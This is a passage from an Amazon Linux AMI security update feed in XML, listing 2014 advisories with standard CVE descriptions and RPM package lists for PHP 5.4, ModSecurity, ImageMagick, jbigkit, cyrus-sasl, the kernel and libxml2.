The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-odbc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.27" release="1.53.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-common" 
version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.27-1.53.amzn1.i686.rpm</filename></package><package 
name="php54-xml" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-bcmath" 
version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.27-1.53.amzn1.i686.rpm</filename></package><package 
name="php54-enchant" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.27-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-334</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-334: medium priority package update for mod24_security</title><issued date="2014-05-06 22:19:00" /><updated date="2014-09-18 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5705:
apache2/modsecurity.c in ModSecurity before 2.7.6 allows remote attackers to bypass rules by using chunked transfer coding with a capitalized Chunked value in the Transfer-Encoding HTTP header.
1082904:
CVE-2013-5705 mod_security: bypass of intended rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5705" title="" id="CVE-2013-5705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_security" version="2.7.3" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-2.7.3-3.24.amzn1.x86_64.rpm</filename></package><package name="mlogc24" version="2.7.3" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc24-2.7.3-3.24.amzn1.x86_64.rpm</filename></package><package name="mod24_security-debuginfo" version="2.7.3" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-debuginfo-2.7.3-3.24.amzn1.x86_64.rpm</filename></package><package name="mod24_security-debuginfo" version="2.7.3" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-debuginfo-2.7.3-3.24.amzn1.i686.rpm</filename></package><package name="mod24_security" version="2.7.3" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-2.7.3-3.24.amzn1.i686.rpm</filename></package><package name="mlogc24" version="2.7.3" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc24-2.7.3-3.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-335</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-335: medium priority package update for mod_security</title><issued date="2014-05-06 22:19:00" /><updated date="2014-09-18 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5705:
apache2/modsecurity.c in ModSecurity before 2.7.6 allows remote attackers to bypass rules by using chunked transfer coding with a capitalized Chunked value in the Transfer-Encoding HTTP header.
1082904:
CVE-2013-5705 mod_security: bypass of intended rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5705" title="" id="CVE-2013-5705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_security" version="2.7.3" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-2.7.3-3.23.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.7.3" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc-2.7.3-3.23.amzn1.x86_64.rpm</filename></package><package name="mod_security-debuginfo" version="2.7.3" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-debuginfo-2.7.3-3.23.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.7.3" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc-2.7.3-3.23.amzn1.i686.rpm</filename></package><package name="mod_security" version="2.7.3" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-2.7.3-3.23.amzn1.i686.rpm</filename></package><package name="mod_security-debuginfo" version="2.7.3" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-debuginfo-2.7.3-3.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-336</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-336: medium priority package update for ImageMagick</title><issued date="2014-05-13 14:03:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2030:
1083477:
CVE-2014-2030 ImageMagick: PSD writing layer name buffer overflow ("L%06ld")
CVE-2014-1958:
1067276:
CVE-2014-1958 ImageMagick: buffer overflow flaw when handling PSD images that use RLE encoding
CVE-2014-1947:
1064098:
CVE-2014-1947 ImageMagick: PSD writing layer name buffer overflow ("L%02ld")
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1947" title="" id="CVE-2014-1947" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1958" title="" id="CVE-2014-1958" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2030" title="" id="CVE-2014-2030" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" 
release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.7.8.9-10.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-337</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-337: medium priority package update for jbigkit</title><issued date="2014-05-13 16:23:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6369:
Stack-based buffer overflow in the jbg_dec_in function in libjbig/jbig.c in JBIG-KIT before 2.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted image file.
1032273:
CVE-2013-6369 jbigkit: stack-based buffer overflow flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6369" title="" id="CVE-2013-6369" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jbigkit" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-devel" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-devel-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-debuginfo" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-debuginfo-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-libs" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-libs-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-debuginfo" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-debuginfo-2.0-11.4.amzn1.i686.rpm</filename></package><package name="jbigkit-libs" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-libs-2.0-11.4.amzn1.i686.rpm</filename></package><package name="jbigkit" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-2.0-11.4.amzn1.i686.rpm</filename></package><package name="jbigkit-devel" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-devel-2.0-11.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-338</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-338: medium priority package update for cyrus-sasl</title><issued date="2014-05-13 16:37:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that 
fix the following vulnerabilities:
CVE-2013-4122:
Cyrus SASL 2.1.23, 2.1.26, and earlier does not properly handle when a NULL value is returned upon an error by the crypt function as implemented in glibc 2.17 and later, which allows remote attackers to cause a denial of service (thread crash and consumption) via (1) an invalid salt or, when FIPS-140 is enabled, a (2) DES or (3) MD5 encrypted password, which triggers a NULL pointer dereference.
984669:
CVE-2013-4122 cyrus-sasl: NULL pointer dereference (DoS) when glibc v.2.17 or FIPS-140 enabled Linux system used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4122" title="" id="CVE-2013-4122" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-sql-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-devel-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-lib-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-plain" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-plain-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-md5-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.14.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/cyrus-sasl-2.1.23-13.14.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-sql-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-lib-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-plain" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-plain-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-devel-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-2.1.23-13.14.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-md5-2.1.23-13.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2014-339</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-339: medium priority package update for kernel</title><issued date="2014-05-13 16:40:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0196:
The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.
1094232:
CVE-2014-0196 kernel: pty layer race condition leading to memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0196" title="" id="CVE-2014-0196" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.40-50.136.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.40" release="50.136.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.40" release="50.136.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.40-50.136.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.40" release="50.136.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.40-50.136.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-340</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-340: low priority package update for libxml2</title><issued date="2014-05-21 10:29:00" /><updated date="2014-09-18 00:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2877:
parser.c in libxml2 before 2.9.0, as used in Google Chrome before 28.0.1500.71 and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a document that ends abruptly, related to the lack of certain checks for the XML_PARSER_EOF state.
983204:
CVE-2013-2877 libxml2: Out-of-bounds read via a document that ends abruptly
